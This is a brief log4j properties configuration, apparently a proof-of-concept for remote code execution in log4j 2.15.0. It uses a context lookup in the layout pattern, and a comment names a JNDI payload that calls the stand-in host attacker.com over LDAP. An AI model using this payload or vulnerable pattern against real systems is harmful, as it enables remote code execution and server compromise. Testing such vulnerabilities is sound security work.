# The attacker data, "${jndi:ldap://attacker.com/a}", will be attempted to be looked up
# this should enable RCE in 2.15.0 (I think?)
appender.console.layout.pattern = ${ctx:layout-pattern-value} - %d{yyyy-MM-dd HH:mm:ss} %-5p %c{1}:%L - %m%n
